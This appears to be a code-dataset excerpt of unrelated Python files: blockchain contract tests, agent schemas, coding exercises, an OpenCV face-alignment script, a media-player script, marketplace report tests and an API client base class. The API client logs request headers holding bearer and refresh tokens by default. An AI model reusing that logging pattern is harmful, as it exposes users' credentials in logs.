Empty.deploy({\"from\": carol})\n\n bridge_adapter_to_enable = [[current_chain_bridge_adapter, destination_chain_bridge_adapter, MainnetChainIds.AVALANCHE]]\n\n\n with reverts(\"29\"): #NOT_IN_EMERGENCY\n\n # call solveEmergency()\n tx = cross_chain_controller_emergency_mode.solveEmergency(\n new_confirmations,\n validity_timestamp_input,\n receiver_adapter_to_allow,\n receiver_adapter_to_disallow,\n senders_to_approve,\n senders_to_remove,\n bridge_adapter_to_enable,\n bridge_adapter_to_disable,\n {\"from\": guardian}\n )\n\n\ndef test_emergency_token_transfer(setup_protocol, owner, deploy_usdt, alice):\n \"\"\"\n Testing emergencyTokenTransfer()\n \"\"\"\n\n cross_chain_controller = setup_protocol[\"cross_chain_controller\"]\n usdt = deploy_usdt\n\n amount_1 = 1000 * 10**6\n usdt.transfer(cross_chain_controller, amount_1, {\"from\": owner})\n\n amount_2 = 800 * 10**6\n tx = cross_chain_controller.emergencyTokenTransfer(usdt, alice, amount_2, {\"from\": owner} )\n\n # Validation\n assert usdt.balanceOf(cross_chain_controller) == amount_1 - amount_2\n assert usdt.balanceOf(alice) == amount_2\n assert tx.events[\"ERC20Rescued\"][\"caller\"] == owner\n assert tx.events[\"ERC20Rescued\"][\"token\"] == usdt.address\n assert tx.events[\"ERC20Rescued\"][\"to\"] == alice\n\n\n\ndef test_emergency_ether_transfer(setup_protocol, owner, deploy_usdt, alice):\n \"\"\"\n Testing emergencyEtherTransfer()\n \"\"\"\n\n cross_chain_controller = setup_protocol[\"cross_chain_controller\"]\n usdt = deploy_usdt\n\n amount_1 = 5 * 10**18\n owner.transfer(cross_chain_controller, amount_1)\n\n amount_2 = 3 * 10**18\n tx = 
cross_chain_controller.emergencyEtherTransfer(alice, amount_2, {\"from\": owner} )\n\n # Validation\n assert cross_chain_controller.balance() == amount_1 - amount_2\n assert tx.events[\"NativeTokensRescued\"][\"caller\"] == owner\n assert tx.events[\"NativeTokensRescued\"][\"to\"] == alice\n assert tx.events[\"NativeTokensRescued\"][\"amount\"] == amount_2\n\n\n\n\n\n","repo_name":"sigp/aave-public-tests","sub_path":"aave-delivery-infrastructure/tests/tests/test_CrossChainControllerWithEmergencyMode.py","file_name":"test_CrossChainControllerWithEmergencyMode.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"29895671892","text":"from enum import Enum\nfrom typing import Dict, List, Optional\n\nfrom pydantic import UUID4, BaseModel, Field\n\nfrom typings.user import UserOutput\n\n\nclass AgentType(str, Enum):\n voice = \"voice\"\n text = \"text\"\n\n\nclass DataSourceFlow(str, Enum):\n PRE_RETRIEVAL = \"pre_execution\"\n SOURCE_DETECTION = \"source_detection\"\n\n\nclass InputModeType(List[str], Enum):\n text = [\"Text\"]\n voice = [\"Voice\"]\n text_voice = [\"Text\", \"Voice\"]\n\n\nclass AgentInput(BaseModel):\n name: str = Field(..., example=\"Agent Smith\")\n description: Optional[str] = Field(None, example=\"Description of the agent\")\n agent_type: Optional[AgentType] = Field(\n None,\n example=AgentType.voice,\n description=\"You have to choose between Text-based and Voice-based agents.\",\n )\n workspace_id: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n role: Optional[str] = Field(\n None, example=\"Speaker\", description=\"A role can be anything of your choosing.\"\n )\n is_memory: Optional[bool] = Field(None, example=True)\n avatar: Optional[str] = Field(\n None,\n example=\"https://raw.githubusercontent.com/l3vels/L3AGI/77d65c9ad74d4da140ef7a30590f063768333bd9/apps/ui/src/assets/tools/openweather.svg\",\n )\n is_template: bool = Field(None, example=True)\n\n\nclass ConfigInput(BaseModel):\n goals: List[str] = Field(\n ...,\n example=[\n \"Provide a concise summary or highlight about the sourced articles.\",\n \"Efficiently locate relevant scientific articles from arxiv.org based on user queries.\",\n ],\n description=\"A list of goals that the agent aims to achieve. These goals can include providing summaries, locating relevant articles, or any other specific objectives.\",\n )\n constraints: List[str] = Field(\n ...,\n example=[\n \"Does not replace professional advice or expert consultations in respective fields.\",\n \"Does not provide opinions or expert analysis. Presents only factual information based on sourced content.\",\n ],\n description=\"A list of constraints or limitations that the agent adheres to. These constraints can include not replacing professional advice, not providing opinions or expert analysis, and presenting only factual information based on sourced content.\",\n )\n tools: List[str] = Field(\n ...,\n example=[\n \"59209d41-83cf-48c5-806a-ec87a55cdcc4\",\n \"ac34d174-6ca4-49cf-aef2-6e2cdf2e0028\",\n ],\n description=\"You should pass an array of Toolkit IDs.\",\n )\n datasources: List[str] = Field(\n ...,\n example=[\"0b9d648f-0fcb-4ced-8e08-502c5b8e0c06\"],\n description=\"You should pass an array of Data Source IDs which you have created.\",\n )\n model: Optional[str] = Field(\n None,\n example=\"8833a90e-86e4-4118-9e28-517de1a4def8\",\n description=\"Expects Model ID\",\n )\n temperature: float = Field(\n ...,\n gt=0,\n le=1.0,\n example=0.5,\n description=\"The temperature parameter for the agent. It should be a float value between 0 and 1, representing the level of randomness in the agent's responses. A higher value like 1.0 will result in more random responses, while a lower value like 0.5 will make the responses more focused and deterministic.\",\n )\n instructions: List[str] = Field(\n ...,\n example=[\n \"The more specific your inquiry, the more accurate Maven's assistance will be.\",\n \"Efficiently locate relevant scientific articles from arxiv.org based on user queries.\",\n ],\n description=\"A list of instructions or guidance for interacting with the agent. These instructions can include tips on how to get more accurate assistance or specific guidelines for using certain features.\",\n )\n suggestions: Optional[List[str]] = Field(\n None,\n example=[\n \"What's the weather like today?\",\n \"Tell me a joke.\",\n \"How can I contact customer support?\",\n ],\n description=\"An array of suggested dialogs or questions that users can choose from to interact with the system.\",\n )\n greeting: Optional[str] = Field(\n None,\n example=\"Hello! I'm the ArXiv & Wikipedia Expert, your dedicated assistant for both academic research and general knowledge. How may I assist you today?\",\n description=\"A greeting message displayed by the assistant to welcome users and provide an introduction to its capabilities.\",\n )\n text: Optional[str] = Field(None, example=\"text\")\n integrations: Optional[List[Dict]] = Field(None)\n source_flow: Optional[str]\n synthesizer: Optional[str] = Field(\n None,\n example=\"142e60f5-2d46-4b1a-9054-0764e553eed6\",\n description=\"only on `voice-based` agents!Expects Voice Tool ID (Play.HT, ElevenLabs, Azure)\",\n )\n default_voice: Optional[str] = Field(\n None, example=\"default_voice\", description=\"only on `voice-based` agents!\"\n )\n voice_id: Optional[str] = Field(\n None, example=\"voice_id\", description=\"only on `voice-based` agents!\"\n )\n transcriber: Optional[str] = Field(\n None,\n example=\"b44769b1-1a20-44d3-b0f1-8b4c96e6a02a\",\n description=\"only on `voice-based` agents!Expects Voice Tool ID (Deepgram, Azure)\",\n )\n response_mode: Optional[list[str]] = Field(\n None, example=[\"Voice\"], description=\"only on `voice-based` agents!\"\n )\n input_mode: Optional[list[str]] = Field(\n None, example=[\"Voice\"], description=\"only on `voice-based` agents!\"\n )\n runners: Optional[List[Dict]] = Field(\n None, example=[{\"task\": \"value1\"}, {\"task\": \"value2\"}]\n )\n sentiment_analyzer: Optional[Dict[str, str]] = Field(\n None, example={\"task\": \"\", \"runner\": \"\"}\n )\n\n\nclass AgentConfigInput(BaseModel):\n agent: AgentInput\n configs: ConfigInput\n\n\nclass CreateVoiceAgentInput(BaseModel):\n template_id: UUID4\n name: Optional[str] = \"\"\n description: Optional[str] = \"\"\n\n\nclass ConfigsOutput(BaseModel):\n goals: List[str]\n constraints: List[str]\n tools: List[str]\n datasources: List[str]\n model: Optional[str]\n temperature: float\n instructions: List[str]\n suggestions: Optional[List[str]]\n greeting: Optional[str]\n text: Optional[str]\n integrations: Optional[List[Dict]]\n source_flow: Optional[str]\n synthesizer: Optional[str]\n default_voice: Optional[str]\n voice_id: Optional[str]\n transcriber: Optional[str]\n response_mode: Optional[List[str]]\n input_mode: Optional[List[str]]\n runners: Optional[List[Dict]]\n sentiment_analyzer: Optional[Dict]\n\n\nclass AgentOutput(BaseModel):\n id: UUID4\n name: str = Field(..., example=\"Agent Smith\")\n description: str = Field(..., example=\"Description of the agent\")\n agent_type: Optional[str] = Field(None, example=\"voice\")\n workspace_id: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n parent_id: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n role: str = Field(..., example=\"Speaker\")\n is_template: bool\n is_deleted: bool\n is_public: bool\n account_id: UUID4 = Field(..., example=\"550e8400-e29b-41d4-a716-446655440000\")\n created_by: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n creator: Optional[UserOutput]\n modified_by: Optional[UUID4] = Field(\n None, example=\"550e8400-e29b-41d4-a716-446655440000\"\n )\n is_memory: Optional[bool]\n avatar: Optional[str] = Field(\n None,\n example=\"https://raw.githubusercontent.com/l3vels/L3AGI/77d65c9ad74d4da140ef7a30590f063768333bd9/apps/ui/src/assets/tools/openweather.svg\",\n )\n\n\nclass AgentWithConfigsOutput(BaseModel):\n agent: AgentOutput\n configs: Optional[ConfigsOutput]\n system_message: Optional[str]\n","repo_name":"l3vels/L3AGI","sub_path":"apps/server/typings/agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":8008,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"72"}
{"seq_id":"1609372328","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\n\nlst = list(map(int,input().split()))\nlst_set = sorted(list(set(lst)))\n\ndic={}\nfor i in range(len(lst_set)):\n dic[lst_set[i]] = i\n\nfor j in lst:\n print(dic[j],end=\" \")","repo_name":"minjeoong/baekjoon_","sub_path":"18870번_좌표 압축.py","file_name":"18870번_좌표 압축.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22636666542","text":"import cv2\nimport numpy as np\n\n# ★나중에 모듈을 불러 올 때 지금처럼 파일 이름은 숫자로 시작하면 안된다.\n\nface_casacade = cv2.CascadeClassifier('./haarcascade_frontalface_default.xml')\neye_casacade = cv2.CascadeClassifier('./haarcascade_eye.xml')\n\n\n# 얼굴 이미지 데이터\nimg = cv2.imread('face.png')\n\n# 이미지 바운딩 박스\n# cascade의 경우는 그레이 스케일 이미지에서만 작동\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) # 이미지 흑백처리\nfaces = face_casacade.detectMultiScale(gray, 1.1, 4) #이미지, 검색 윈도우 확대 비율(기본값은 1.1), 최소 검출횟수\n\n\nfor (x,y,w,h) in faces:\n cv2.rectangle(img, (x,y), (x+w,y+h), (0,255,0), 3)\n\n\n# roi는 관심영역. 눈 외에 다른 곳에도 패딩이 나오는 것을 방지.\n# 관심 영역 두개 생성\nroi_color = img[y:y+h, x:x+w] \nroi_gray = gray[y:y+h, x:x+w]\n\n# 두 눈 변수 생성\neyes = eye_casacade.detectMultiScale(roi_gray, 1.1, 4)\nindex=0\n\n# for문으로 양 쪽 눈 데이터 생성\nfor (ex, ey, ew, eh) in eyes:\n if index == 0:\n eye_1 = (ex, ey, ew, eh)\n elif index ==1:\n eye_2 = (ex, ey, ew, eh)\n \n cv2.rectangle(roi_color, (ex,ey), (ex+ew, ey+eh), (0,0,255), 3)\n index = index + 1\n\n\n# 왼쪽, 오른쪽 눈 지정\nif eye_1[0] < eye_2[0]:\n left_eye = eye_1\n right_eye = eye_2\nelse:\n left_eye = eye_2\n right_eye = eye_1\n\n\n# 직사각형 중심점 좌표 계산\nleft_eye_center = (int(left_eye[0] + (left_eye[2] / 2)), int(left_eye[1] + (left_eye[3] / 2)))\nleft_eye_x = left_eye_center[0]\nleft_eye_y = left_eye_center[1]\n\nright_eye_center = (int(right_eye[0] + (right_eye[2] / 2)), int(right_eye[1] + (right_eye[3] / 2)))\nright_eye_x = right_eye_center[0]\nright_eye_y = right_eye_center[1]\n\n\n# 두 눈의 중심선 사이에 선 긋기\n# cv2.circle(roi_color, left_eye_center, 5, (255, 0, 0), -1)\n# cv2.circle(roi_color, right_eye_center, 5, (255, 0, 0), -1)\n# cv2.line(roi_color, right_eye_center, left_eye_center, (0,200,200), 3)\n# cv2.imshow('face', img)\n# cv2.waitKey(0)\n\n# 이미지 회전을 위한 수평선과 두 눈 중심점 연결하는 선 사이 각도 계산\nif left_eye_y > right_eye_y:\n A = (right_eye_x, left_eye_y)\n # -1은 시계 방향으로 회전\n # direction = -1\nelse:\n A = (left_eye_x, right_eye_y)\n # direction = 1\n\n# 두 눈 사이 점들 잇기\n\n# cv2.circle(roi_color, A, 5, (255,0,0), -1)\n\n# cv2.line(roi_color, right_eye_center, left_eye_center, (0,200,200), 3)\n# cv2.line(roi_color, left_eye_center, A, (0,200,200), 3)\n# cv2.line(roi_color, right_eye_center, A, (0,200,200), 3)\n\n# cv2.imshow('face', img)\n# cv2.waitKey(0)\n\n# 왼쪽 눈 y좌표 > 오른쪽 눈 y좌표 -> 이미지를 시계방향으로 회전 반대의 경우 반시계 방향 회전\ndelta_x = right_eye_x - left_eye_x\ndelta_y = right_eye_y - left_eye_y\nangle = np.arctan(delta_y/delta_x)\nangle = (angle * 180) / np.pi\n\n# 이미지를 세타만큼 회전\nh, w = img.shape[:2]\ncenter = (w // 2, h // 2)\n\nM = cv2.getRotationMatrix2D(center, (angle), 1.0)\nrotated = cv2.warpAffine(img, M, (w,h))\n\ncv2.imshow(\"face.png\", rotated)\ncv2.waitKey(0)\n\n\n# for (x,y,w,h) in eyes:\n# cv2.rectangle(roi_color, (x,y), (x+w,y+h), (0,255,0), 3)\n\n# '''\n# get eyes cor(좌표) -> cal degree -> make affine metrix -> image affine transform\n# '''\n\n# eyes = face_casacade.detectMultiScale(roi_gray, 1.1, 4)\n# # print(eyes)\n# index = 0\n\n# for (ex, ey, ew, eh) in eyes:\n# if index == 0:\n# eye_1 = (ex, ey, ew, eh)\n# elif index ==1:\n# eye_2 = (ex, ey, ew, eh)\n \n# cv2.rectangle(roi_color)\n\n\n# cv2.imshow('face box', face_img)\n# cv2.waitKey(0)","repo_name":"Byunggu-Son/MS_AI_School","sub_path":"이미지 다루기 및 데이터셋 구축/DAY46-22_12_07_OpenCV/3/3_2_face_eye_detect_1.py","file_name":"3_2_face_eye_detect_1.py","file_ext":"py","file_size_in_byte":3662,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"38654936066","text":"import requests\n\nfrom client.exceptions import BadRequest\nfrom client.exceptions import Conflict\nfrom client.exceptions import Forbiden\nfrom client.exceptions import InternalServerError\nfrom client.exceptions import NotFound\nfrom client.exceptions import Unauthorized\nfrom client.logger import SrvLoggerFactory\n\n\nclass BaseAPIClass:\n\n _logger = SrvLoggerFactory().get_logger()\n\n def __init__(self, api_client):\n \"\"\"Function Summary: The base class for all apis class. It will include some common functions for api\n operations. Normally, it will be inherient by other classes.\n\n Args:\n api_client (PILOT): the client instance that initialize by password or token\n based authentication\n\n Examples:\n >>> # some login operations\n >>> api_client = PILOT(endpoint, user, pass)\n >>> BAC = BaseAPIClass(api_client)\n \"\"\"\n self.client = api_client\n self.track_flag = True\n\n def _send_request(\n self, api_endpoint, method='GET', json={}, params={}, headers={}, data={}, cookies={}, files=None, stream=False\n ):\n \"\"\"Function Summary: private function for sending the request. Since all the api will need to send with\n `Authorization` and `Refresh-token` in headers. it is a wrapper for request sending.\n\n Args:\n api_endpoint (string): the relative path for the api endpoints\n method (string): HTTP methods: GET, POST, DELETE, PUT\n json (dict): the payload for the api logics\n params (dict): the args for the api logics\n headers (dict): the extra headers for the api logic, by default, api will add\n two more attribute: `Authorization` and `Refresh-token`\n files (file stream): to update the file\n stream (stream): flag for return to handle the large reponse\n\n Examples:\n >>> # get request\n >>> self._send_request()\n \"\"\"\n\n # add the at and rt into headers if there is no provided new token in header\n if not headers.get('Authorization', None):\n headers.update({'Authorization': 'Bearer ' + self.client.token.access_token})\n headers.update({'Refresh-token': self.client.token.refresh_token})\n\n res = requests.request(\n method=method,\n url=self.client.base_url + api_endpoint,\n json=json,\n params=params,\n headers=headers,\n data=data,\n cookies=cookies,\n files=files,\n stream=stream,\n )\n\n # if we request large return eg(files) we will return it right away\n if stream:\n return res\n\n try:\n self._track_print('====== ')\n self._track_print('calling:', method, self.client.base_url + api_endpoint)\n self._track_print('request parameter:', params)\n self._track_print('request json payload:', json)\n self._track_print('request headers:', headers)\n self._track_print('request result:', res.json())\n self._track_print('====== ')\n\n # response error mapping if not 200 raise the exception\n exception_mapping = {\n 400: lambda msg: BadRequest(msg),\n 401: lambda msg: Unauthorized(msg),\n 403: lambda msg: Forbiden(msg),\n 404: lambda msg: NotFound(msg),\n 409: lambda msg: Conflict(msg),\n }\n isr = lambda msg: InternalServerError\n\n code = res.json().get('code', 200)\n if code >= 300:\n raise exception_mapping.get(code, isr)(res.json())\n\n except Exception as e:\n self._logger.error(res.__dict__)\n raise e\n\n return res\n\n def track_on(self):\n \"\"\"Function Summary: private function for flagging up the logger.\n\n Args:\n None\n\n Examples:\n >>> self._track_on()\n \"\"\"\n\n self.track_flag = True\n\n def track_off(self):\n \"\"\"Function Summary: private function for flagging down the logger.\n\n Args:\n None\n\n Examples:\n >>> self._track_off()\n \"\"\"\n\n self.track_flag = False\n\n def _track_print(self, *message):\n \"\"\"Function Summary: private function for conditional logger print.\n\n Args:\n None\n\n Examples:\n >>> self._track_print(\"message1\", varibale1)\n \"\"\"\n if self.track_flag:\n message = [str(m) for m in message]\n self._logger.info(' '.join(message))\n","repo_name":"BrainModes/sdk","sub_path":"client/api/base_class.py","file_name":"base_class.py","file_ext":"py","file_size_in_byte":4642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34743934213","text":"def main():\n\tuser_input = input('Enter a string: ')\n\n\tvow = vowels_funct(user_input)\n\tcons = consonants_funct(user_input)\n\n\t# Display the result\n\n\tprint('Total vowel letters is:', vow)\n\tprint('Total consonants letters is:', cons)\n\n\ndef vowels_funct(user_input):\n\tcount_vow = 0\n\tvowels_alph = 'aeiou'\n\n\tfor ch in user_input:\n\t\tif ch in vowels_alph:\n\t\t\tcount_vow += 1\n\n\treturn count_vow\n\n\ndef consonants_funct(user_input):\n\tcount_cons = 0\n\tconsonants_alph = 'bcdfghjklmnpqrstvwxyz'\n\n\tfor ch in user_input:\n\t\tif ch in consonants_alph:\n\t\t\tcount_cons += 1\n\n\treturn count_cons\n\nmain()\n","repo_name":"legendbabs/StartingOutWithPython","sub_path":"StartOutWithPython/Chapter08/ProgrammingExercise/vowels_consonants.py","file_name":"vowels_consonants.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"}
{"seq_id":"8439077978","text":"from sys import stdin, setrecursionlimit\nsetrecursionlimit(10**7)\n\n\nclass Node:\n def __init__(self, data) -> None:\n self.data = data \n self.next = None\n\ndef append_last_node_first(head, n):\n if n == 0 or head is None:\n return head\n fast = head\n slow = head\n intitial_head = head\n for i in range(n):\n fast = fast.next\n while fast.next is not None:\n slow = slow.next\n fast = fast.next\n temp = slow.next\n slow.next = None\n fast.next = intitial_head\n head = temp\n return head\n \n\ndef take_input():\n head = None\n tail = None\n lst = list(map(int, stdin.readline().strip().split()))\n i = 0\n while i < len(lst) and lst[i] != -1:\n new_node = Node(lst[i])\n if head is None:\n head = new_node\n tail = new_node\n else:\n tail.next = new_node\n tail = new_node\n i += 1\n return head\n\n\ndef display_linked_list(head):\n current = head\n while current is not None:\n print(current.data, end=' ')\n current = current.next\n print()\n\n\ndef main():\n t = int(stdin.readline().strip())\n while t > 0:\n h = take_input()\n k_node = int(stdin.readline().strip())\n head = append_last_node_first(head=h, n=k_node)\n display_linked_list(head=head)\n t -= 1\n\n\nif __name__ == '__main__':\n main()\n\n# 1\n# 10 6 77 90 61 67 100 -1\n# 4","repo_name":"Sam21sop/Coding_Ninjas_2023","sub_path":"01_Career_Camp_Data_Structure_in_Python/20_Linked_List_1/AppendLastNodeToFirst.py","file_name":"AppendLastNodeToFirst.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"74390164394","text":"\nimport sys, argparse, logging\n\nimport os\nfrom os import listdir\nfrom os.path import isfile, join\n\nimport subprocess\n\nimport pygame\n\nos.environ[\"DISPLAY\"] = \":0\"\npygame.init()\n\nscreen = pygame.display.set_mode((0,0), pygame.FULLSCREEN | pygame.NOFRAME)\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\nomx_command = ['omxplayer', \"-o\", \"hdmi\", \"-b\"]\n\ndef getFullPath(filename):\n return BASE_DIR + '/videos/' + filename\n\nplaylist = [getFullPath('dog.mp4'),getFullPath('dog2.mp4')]\n\n# def generatePlaylist(inpath):\n# return [f for f in listdir(inpath) if isfile(join(inpath, f))]\n# def main():\n \ndef main():\n # for f in playlist:\n # full_command = omx_command + [f]\n # stdout = subprocess.PIPE\n # proc = None\n # try:\n # # logging.debug(\"playing: {0}\".format(full_path))\n # print(f'playing: {f}')\n # proc = subprocess.run(full_command, check=True, stdin=subprocess.PIPE, stdout=stdout, close_fds=True)\n # except KeyboardInterrupt:\n # if proc is not None:\n # proc.kill()\n # # logging.info(\"Keyboard Interrupt\")\n # sys.exit()\n # except Exception as e:\n # # logging.exception()\n\n for f in playlist:\n full_command = omx_command + [f]\n sys.stdout = subprocess.PIPE \n proc = None \n try:\n proc = subprocess.run(full_command,check=True,stdin=subprocess.PIPE,stdout=sys.stdout,close_fds=True)\n except KeyboardInterrupt:\n if proc is not None:\n proc.kill() \n sys.exit()\n except Exception as e:\n print(e)\n\n\n\nrunning = True\n\nwhile running:\n main()\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE: \n running = False\n\npygame.quit()\n\n\n\n","repo_name":"binoy638/omxplayer-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"185315919","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\nimport runner # noqa\n\nfrom core.types import (\n BlueOffer,\n CategoryStatsRecord,\n Currency,\n HyperCategory,\n HyperCategoryType,\n MarketSku,\n Model,\n Offer,\n Opinion,\n RegionalModel,\n Shop,\n Tax,\n Vat,\n YamarecFeaturePartition,\n YamarecPlace,\n YamarecSettingPartition,\n)\nfrom core.matcher import Absent\nfrom core.testcase import main\nfrom simple_testcase import SimpleTestCase\nfrom core.dj import DjModel\n\n\nclass T(SimpleTestCase):\n \"\"\"\n Проверка корректности работы со стандартными параметрами для пэйджинга numdoc и page\n \"\"\"\n\n @classmethod\n def prepare(cls):\n # blue shop\n cls.index.shops += [\n Shop(\n fesh=1886710,\n datafeed_id=188671001,\n priority_region=213,\n fulfillment_virtual=True,\n virtual_shop_color=Shop.VIRTUAL_SHOP_BLUE,\n currency=Currency.RUR,\n tax_system=Tax.OSN,\n supplier_type=Shop.FIRST_PARTY,\n ),\n Shop(\n fesh=1,\n datafeed_id=1,\n priority_region=213,\n currency=Currency.RUR,\n tax_system=Tax.OSN,\n supplier_type=Shop.FIRST_PARTY,\n blue=Shop.BLUE_REAL,\n ),\n Shop(fesh=2, priority_region=213),\n ]\n model_ids = list(range(1, 6))\n cls.recommender.on_request_viewed_models(user_id=\"yandexuid:1001\").respond({\"models\": map(str, model_ids)})\n cls.recommender.on_request_models_of_interest(\n user_id=\"yandexuid:1001\", item_count=40, with_timestamps=True, version=4\n ).respond({'models': map(str, model_ids), 'timestamps': map(str, list(range(len(model_ids), 0, -1)))})\n cls.bigb.on_request(yandexuid=\"1001\", client='merch-machine').respond(counters=[])\n cls.index.models += [Model(hyperid=hyperid, hid=100 + hyperid) for hyperid in model_ids]\n cls.index.offers += [Offer(hyperid=hyperid) for hyperid in model_ids]\n cls.settings.set_default_reqid = False\n cls.dj.on_request(yandexuid='1001').respond(\n [DjModel(id='1'), DjModel(id='2'), DjModel(id='3'), DjModel(id='4')]\n )\n\n def test_products_by_history(self):\n \"\"\"\n Проверяем paging в выдаче products_by_history\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query=\"place=products_by_history&yandexuid=1001&&rearr-factors=market_disable_dj_for_recent_findings%3D1\",\n ids=list(range(1, 5)),\n )\n\n @classmethod\n def prepare_also_viewed(cls):\n \"\"\"\n Конфигурация для получения нескольких моделей на выдаче also_viewed\n \"\"\"\n cls.index.yamarec_places += [\n YamarecPlace(\n name=YamarecPlace.Name.ALSO_VIEWED_PRODUCTS,\n kind=YamarecPlace.Type.SETTING,\n split_rule=YamarecPlace.SplitRule.ABT,\n partitions=[\n YamarecSettingPartition(params={'version': '1'}, splits=[{\"split\": \"also_viewed\"}]),\n ],\n ),\n ]\n cls.recommender.on_request_accessory_models(model_id=1, item_count=1000, version='1').respond(\n {'models': ['2', '3', '4', '5']}\n )\n\n def test_also_viewed(self):\n \"\"\"\n Проверяем paging в выдаче also_viewed\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query=\"place=also_viewed&rearr-factors=split=also_viewed&hyperid=1\", ids=list(range(2, 6))\n )\n\n def test_also_viewed_track_last_page(self):\n \"\"\"\n Проверяем, что не отдаются офферы со страниц после последней\n \"\"\"\n response = self.report.request_json(\n 'place=also_viewed&rearr-factors=split=also_viewed&hyperid=1&numdoc=10&page=2'\n )\n self.assertFragmentIn(response, {\"results\": Absent()})\n\n @classmethod\n def prepare_personal_category_models(cls):\n \"\"\"\n Данные для непустой выдачи personalcategorymodels\n \"\"\"\n\n cls.index.models += [\n Model(hyperid=11, hid=111, model_clicks=100),\n Model(hyperid=12, hid=112, model_clicks=100),\n Model(hyperid=13, hid=113, model_clicks=100),\n Model(hyperid=14, hid=114, model_clicks=100),\n Model(hyperid=15, hid=115, model_clicks=100),\n ]\n\n cls.index.regional_models += [\n RegionalModel(hyperid=11, offers=100),\n RegionalModel(hyperid=12, offers=100),\n RegionalModel(hyperid=13, offers=100),\n RegionalModel(hyperid=14, offers=100),\n RegionalModel(hyperid=15, offers=100),\n ]\n\n cls.index.offers += [Offer(hyperid=hyperid) for hyperid in range(11, 16)]\n\n cls.index.hypertree += [\n HyperCategory(hid=111, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=112, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=113, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=114, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=115, output_type=HyperCategoryType.GURU),\n ]\n\n cls.index.yamarec_places += [\n YamarecPlace(\n name=YamarecPlace.Name.CATEGORY_GENERIC,\n kind=YamarecPlace.Type.FORMULA,\n split_rule=YamarecPlace.SplitRule.ABT,\n partitions=[\n YamarecFeaturePartition(\n feature_names=['category_id', 'position'],\n feature_keys=['category_id'],\n features=[],\n splits=[{}],\n ),\n ],\n )\n ]\n cls.recommender.on_request_models_of_interest(\n user_id=\"yandexuid:personalcategorymodels\", item_count=1000\n ).respond({\"models\": map(str, list(range(11, 16)))})\n\n def test_personal_category_models(self):\n \"\"\"\n Проверка пэйджинга для place=personalcategorymodels\n \"\"\"\n self.assertPagingSupportedForModels(\n base_query='place=personalcategorymodels&yandexuid=personalcategorymodels&rearr-factors=split=personalcategorymodels',\n ids=list(range(11, 16)),\n )\n\n @classmethod\n def prepare_popular_products(cls):\n \"\"\"\n Проверка пэйджинга для популярных товаров\n \"\"\"\n cls.index.hypertree += [\n HyperCategory(\n hid=9200,\n children=[\n HyperCategory(hid=9201, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9202, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9203, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9204, output_type=HyperCategoryType.GURU),\n HyperCategory(hid=9205, output_type=HyperCategoryType.GURU),\n ],\n ),\n ]\n\n model_ids = list(range(91, 96))\n cls.index.models += [\n Model(hyperid=91, hid=9201, model_clicks=500, opinion=Opinion(total_count=300, rating=5.0)),\n Model(hyperid=92, hid=9201, model_clicks=400, opinion=Opinion(total_count=300, rating=4.0)),\n Model(hyperid=93, hid=9201, model_clicks=300, opinion=Opinion(total_count=300, rating=3.0)),\n Model(hyperid=94, hid=9201, model_clicks=200, opinion=Opinion(total_count=300, rating=2.0)),\n Model(hyperid=95, hid=9201, model_clicks=100, opinion=Opinion(total_count=300, rating=1.0)),\n Model(hyperid=96, hid=9201, model_clicks=500, opinion=Opinion(total_count=300, rating=5.0)),\n Model(hyperid=97, hid=9201, model_clicks=400, opinion=Opinion(total_count=300, rating=4.0)),\n Model(hyperid=98, hid=9201, model_clicks=300, opinion=Opinion(total_count=300, rating=3.0)),\n Model(hyperid=99, hid=9201, model_clicks=200, opinion=Opinion(total_count=300, rating=2.0)),\n Model(hyperid=100, hid=9201, model_clicks=100, opinion=Opinion(total_count=300, rating=1.0)),\n ]\n\n cls.index.offers += [Offer(hyperid=hyperid, fesh=2) for hyperid in model_ids]\n feed_ids = [1] * 5\n prices = [5, 50, 45, 36, 15]\n sku_offers = [BlueOffer(price=price, vat=Vat.VAT_10, feedid=feedid) for feedid, price in zip(feed_ids, prices)]\n\n # market skus\n cls.index.mskus += [\n MarketSku(hyperid=hyperid, sku=hyperid * 1000 + 1, blue_offers=[sku_offer])\n for hyperid, sku_offer in zip(model_ids, sku_offers)\n ]\n\n cls.index.blue_category_region_stat += [\n CategoryStatsRecord(hid=9201, region=213, n_offers=3, n_discounts=3),\n ]\n cls.bigb.on_request(yandexuid=\"1009\", client='merch-machine').respond(counters=[])\n\n 